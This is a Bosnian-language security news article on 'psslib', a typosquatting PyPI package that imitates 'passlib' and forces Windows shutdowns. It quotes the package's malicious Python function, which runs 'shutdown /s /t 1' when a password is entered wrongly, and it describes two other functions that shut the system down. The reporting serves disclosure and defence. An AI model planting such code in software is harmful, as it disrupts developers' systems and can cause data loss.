Pojavio se zlonamjerni Python paket na Python Package Index (PyPI) koji se predstavlja kao legitimna biblioteka za sigurnost lozinki, ciljajući Windows developere s trenutnim gašenjem sistema pri pogrešnom unosu lozinke.
Ovaj zlonamjerni paket, nazvan “psslib”, predstavlja sofisticirani napad typosquattinga na široko korištenu “passlib” biblioteku, koja ostvaruje preko 8,9 miliona mjesečnih preuzimanja od developera koji implementiraju sigurne sisteme autentikacije.
Malware pokazuje posebno podmukao pristup eksploatisanjem povjerenja developera u pakete fokusirane na sigurnost.
Za razliku od tradicionalnih napada na lance snabdijevanja koji djeluju prikriveno kako bi ukrali podatke ili uspostavili postojanost, ovaj paket prioritet daje trenutnom ometanju umjesto skrivenim operacijama.
Objavljen od strane aktera prijetnje identificiranog kao “umaraq”, paket lažno reklamira sebe kao sigurnosno rješenje koje će “osigurati vaš Python program”, dok sadrži destruktivni kod dizajniran da izazove neposrednu štetu sistemu.
Istraživači Socket.dev-a su identifikovali zlonamjerni paket putem svojih AI-baziranih sistema skeniranja, koji su označili destruktivno ponašanje gašenja sistema kao anomalno za navodnu sigurnosnu biblioteku.
Paket ostaje aktivan na PyPI-ju uprkos formalnim peticijama za njegovo uklanjanje, nastavljajući da predstavlja rizike za nesuđene developere koji bi mogli slučajno instalirati verziju sa greškama tokom rutinskog upravljanja zavisnostima.
Napad specifično cilja Windows razvojna okruženja, gdje Python developeri obično posjeduju povlaštene sistemske privilegije neophodne za automatizaciju i zadatke razvoja aplikacija.
Kada ovi developeri integrišu zlonamjerni paket u svoje radne procese, destruktivni teret stječe pristup na sistemskom nivou neophodan za izvršavanje trenutnih naredbi za gašenje, potencijalno uzrokujući gubitak podataka i ometanje radnog procesa u razvojnim timovima.
**Tehnička implementacija i mehanizam napada**
psslib paket implementira svoj destruktivni teret kroz de facto jednostavne Python funkcije koje koriste easygui biblioteku za interakciju s korisnikom i os modul za sistemske komande.
Primarni vektor napada centriran je oko funkcije provjere lozinke koja trenutno pokreće Windows shutdown kada korisnici unesu pogrešne kredencijale:
“`python
import os
import easygui
def spc(password):
if easygui.enterbox(‘enter password:-‘) != password:
os.system(“shutdown /s /t 1”) # Shutdown in 1 second
“`
Pored gašenja pokrenutog lozinkom, paket uključuje dodatne funkcije dizajnirane da prošire vektore napada.
Funkcija “src()” omogućava direktno gašenje sistema bez ikakvih zahtjeva za autentifikacijom, dok funkcija “error()” kombinira prikaz poruke o grešci sa izvršavanjem prisilnog gašenja.
Ovi višestruki vektori napada osiguravaju da se zlonamjerni teret može izvršiti bez obzira na to kako developeri integrišu paket u svoje aplikacije, maksimizirajući potencijal za ometanje sistema u različitim scenarijima implementacije.
